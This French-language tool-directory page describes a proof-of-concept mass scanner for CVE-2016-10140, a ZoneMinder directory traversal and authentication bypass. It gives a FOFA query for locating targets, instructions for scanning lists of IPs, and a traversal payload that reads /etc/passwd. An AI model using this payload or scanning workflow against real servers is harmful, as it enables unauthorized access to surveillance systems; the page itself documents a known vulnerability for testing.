Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2016-10140-Zoneminder-Poc — Zoneminder outil de détection par lots d'accès non autorisé : dans les configurations du serveur Apache HTTP fourni avec ZoneMinder v1.30 et v1.29, il existe des vulnérabilités de fuite d'informations et de contournement d'authentification, permettant à un attaquant distant non authentifié de parcourir tous les répertoires sous la racine web. | Kitploit
Outils/GitHubGitHub/asaotomo/cve-2016-10140-zoneminder-poc
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubasaotomo/cve-2016-10140-zoneminder-poc

CVE-2016-10140-Zoneminder-Poc

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
811il y a 4 ansPas encore vérifié

À propos

Zoneminder outil de détection par lots d'accès non autorisé : dans les configurations du serveur Apache HTTP fourni avec ZoneMinder v1.30 et v1.29, il existe des vulnérabilités de fuite d'informations et de contournement d'authentification, permettant à un attaquant distant non authentifié de parcourir tous les répertoires sous la racine web.

Partager

Script de validation en masse pour l'accès non autorisé à ZoneMinder (CVE-2016-10140) – Poc

Description de la vulnérabilité

ZoneMinder est un système de vidéosurveillance open source. Il permet d'envoyer des notifications par e-mail ou SMS lorsqu'un événement anormal se produit. La configuration du serveur HTTP Apache fournie avec ZoneMinder v1.30 et v1.29 présente des vulnérabilités de fuite d'informations et de contournement d'authentification, permettant à un attaquant distant non authentifié de parcourir tous les répertoires à la racine web.

Syntaxe FOFA

app="ZoneMinder"

Utilisation

root@kitploit:~
1. Placez les adresses IP à tester dans le fichier ip.txt
2. Exécutez python3 exp.py
image

PAYLOAD

root@kitploit:~
/?view=file&path=/../../../../../etc/passwd
image

Avertissement

Cet outil est fourni uniquement aux professionnels de la sécurité pour effectuer des auto-vérifications. L'auteur décline toute responsabilité en cas d'utilisation abusive. Les utilisateurs doivent impérativement respecter les lois locales. Ce programme est destiné à un usage éducatif et non commercial.

iShot2021-12-23 15 42 05
Télécharger l’outil